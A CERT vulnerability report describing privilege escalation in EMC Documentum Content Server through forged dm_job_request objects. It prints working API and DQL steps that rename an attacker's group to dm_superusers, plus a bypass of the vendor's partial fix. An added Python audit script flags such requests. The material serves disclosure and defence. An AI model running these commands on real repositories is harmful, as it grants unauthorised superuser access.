Vulnerability Report Confirmation - [VRF#HUFV0UZN]

Report Tracking ID: VRF#HUFV0UZN

------------------------------------------------------------------------

Vulnerability Report

Name: Andrey B. Panfilov
Organization: independent
Email Address: andrew@panfilov.tel

Vulnerability Description

EMC Documentum Content Server: any user is able to elevate privileges by creating malicious dm_job_request objects.

The vendor was notified about the vulnerability in November 2013. Although the vendor claims that the vulnerability has been fixed, the fix was never announced and it is incomplete.

Documentum Content Server has two service tasks intended for renaming users and groups: dm_UserRename and dm_GroupRename. Both are triggered when an administrator renames a user or group in Documentum Administrator, or when the dm_LDAPSynchronization job completes its execution. These jobs poll uncompleted dm_job_request objects and perform the corresponding changes. The problem is that any user is able to create a malicious dm_job_request object and either rename his own group to a system group (e.g. dm_superusers) or gain unauthorized access to objects.

Example of exploitation:

    -- creating test group
    API> create,c,dm_group
    ...
    1201d9208000dd00
    API> set,c,l,group_name
    SET> testjobrequest
    ...
    OK
    API> save,c,l
    ...
    OK

    -- creating test user
    API> create,c,dm_user
    ...
    1101d9208007890i
    API> set,c,l,user_name
    SET> testjobrequestusr
    ...
    OK
    API> set,c,l,user_login_name
    SET> testjobrequestusr
    ...
    OK
    API> set,c,l,user_source
    SET> inline password
    ...
    OK
    API> set,c,l,user_password
    SET> test
    ...
    OK
    API> save,c,l
    ...
    OK
    API> ?,c,alter group testjobrequest add testjobrequestusr

    -- creating test user session
    API> connect,repo,testjobrequestusr,test
    ...
    s1

    -- creating request to rename testjobrequest group to dm_superusers
    API> ?,s1,CREATE dm_job_request OBJECT set object_name='GroupRename',
    set job_name='dm_GroupRename',
    set method_name='dm_GroupRename',
    set arguments_keys[0]='OldGroupName',
    set arguments_values[0]='testjobrequest',
    set arguments_keys[1]='NewGroupName',
    set arguments_values[1]='dm_superusers',
    set arguments_keys[2]='report_only',
    set arguments_values[2]='F',
    set arguments_keys[3]='unlock_locked_obj',
    set arguments_values[3]='T'
    object_created
    ----------------
    0801d920805759f7
    (1 row affected)

    -- wait some time while dm_GroupRename job completes
    -- now testjobrequestusr user is a member of dm_superusers group
    API> ?,s1,select group_name from dm_group where any i_all_users_names='testjobrequestusr'
    group_name
    --------------------------------
    dm_superusers
    (1 row affected)

Currently EMC is trying to implement the following approach to fix this issue: they deny creation of dm_job_request objects with specific values of job_name:

    [DM_SESSION_I_SESSION_START]info:  "Session 0101d920800f022e started for user unprivileged_user."
    Connected to Documentum Server running Release 6.7.1260.0322  Linux.Oracle
    1> CREATE dm_job_request OBJECT set object_name='GroupRename',
    2> set job_name='dm_GroupRename',
    3> set method_name='dm_GroupRename',
    4> set arguments_keys[0]='OldGroupName',
    5> set arguments_values[0]='testjobrequest',
    6> set arguments_keys[1]='NewGroupName',
    7> set arguments_values[1]='dm_superusers',
    8> set arguments_keys[2]='report_only',
    9> set arguments_values[2]='F',
    10> set arguments_keys[3]='unlock_locked_obj',
    11> set arguments_values[3]='T'
    12> go
    [DM_QUERY_F_UP_SAVE]fatal:  "UPDATE:  An error has occurred during a save operation."
    [DM_USER_E_NEED_SU_OR_SYS_PRIV]error:  "The current user (unprivileged_user) needs to have superuser or sysadmin privilege."

BUT:

    1> CREATE dm_job_request OBJECT set object_name='GroupRename',
    2> set job_name='dm_GroupRename1',
    2> set method_name='dm_GroupRename',
    4> set arguments_keys[0]='OldGroupName',
    5> set arguments_values[0]='testjobrequest',
    6> set arguments_keys[1]='NewGroupName',
    7> set arguments_values[1]='dm_superusers',
    8> set arguments_keys[2]='report_only',
    9> set arguments_values[2]='F',
    10> set arguments_keys[3]='unlock_locked_obj',
    11> set arguments_values[3]='T'
    12> go
    object_created
    ----------------
    0801d92080592bcd
    (1 row affected)

So, according to VRF#HUFU6FNP, a non-privileged user is still able to exploit this vulnerability by creating his own dm_job object and a malicious dm_job_request. Also note that a user with sysadmin privilege (VRF#HUDHKNW4) is able to exploit this vulnerability.

Can we provide your name to the vendor? Yes
Do you want to be publicly acknowledged? Yes
Vendor Contact Status: will not contact
Vendor Name: EMC
Affected System Configurations: All versions of EMC Documentum Content Server
Is the vulnerability being exploited? Yes
Is there a public exploit? No
Date: 2014-04-25T15:16:00
Report Tracking ID: VRF#HUFV0UZN
CERT Tracking IDs: VU#315340

------------------------------------------------------------------------
©2014 Carnegie Mellon University
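The report shows why a filter keyed on job_name is insufficient: the requester chooses job_name, while the rename that actually runs is determined by method_name and the NewGroupName/NewUserName arguments. As an added example (not part of the report or of EMC's product), the following Python audit flags dm_job_request records by method_name, by the rename target, and by the requester's privilege; the creator and creator_privilege fields are assumptions standing in for however a site resolves who created the request and that account's dm_user privilege level.

```python
# Added example (not from the report or EMC): audit dm_job_request records
# by method_name and rename target rather than job_name, so the
# job_name='dm_GroupRename1' variant shown above is still caught.
from dataclasses import dataclass

RENAME_METHODS = {"dm_GroupRename", "dm_UserRename"}
PRIVILEGED = {"superuser", "sysadmin"}   # accounts allowed to queue renames

@dataclass
class JobRequest:
    job_name: str
    method_name: str
    arguments_keys: list
    arguments_values: list
    creator: str            # assumption: account that created the request
    creator_privilege: str  # assumption: taken from the creator's dm_user

    def args(self) -> dict:
        # The rename job pairs arguments_keys[i] with arguments_values[i].
        return dict(zip(self.arguments_keys, self.arguments_values))

def audit(req: JobRequest) -> list:
    """Return reasons this request looks like a privilege-escalation attempt."""
    findings = []
    if req.method_name not in RENAME_METHODS:
        return findings                    # not a user/group rename at all
    if req.job_name != req.method_name:
        findings.append("job_name does not match method_name")
    if req.creator_privilege not in PRIVILEGED:
        findings.append("rename queued by non-privileged user " + req.creator)
    target = req.args().get("NewGroupName") or req.args().get("NewUserName", "")
    if target.startswith("dm_"):
        findings.append("rename target is a system principal: " + target)
    return findings

# Constructed sample: both requests from the report plus a benign admin rename.
KEYS = ["OldGroupName", "NewGroupName", "report_only", "unlock_locked_obj"]
SAMPLE = [
    JobRequest("dm_GroupRename", "dm_GroupRename", KEYS,
               ["testjobrequest", "dm_superusers", "F", "T"], "testjobrequestusr", "none"),
    JobRequest("dm_GroupRename1", "dm_GroupRename", KEYS,
               ["testjobrequest", "dm_superusers", "F", "T"], "unprivileged_user", "none"),
    JobRequest("dm_GroupRename", "dm_GroupRename", KEYS[:2],
               ["sales", "marketing"], "dmadmin", "superuser"),
]

def audit_all(reqs=SAMPLE) -> dict:
    """Map each request's creator to its findings (empty list means clean)."""
    return {r.creator: audit(r) for r in reqs}
```

Run periodically against uncompleted dm_job_request objects, any non-empty finding list is worth holding the request before the rename jobs poll it.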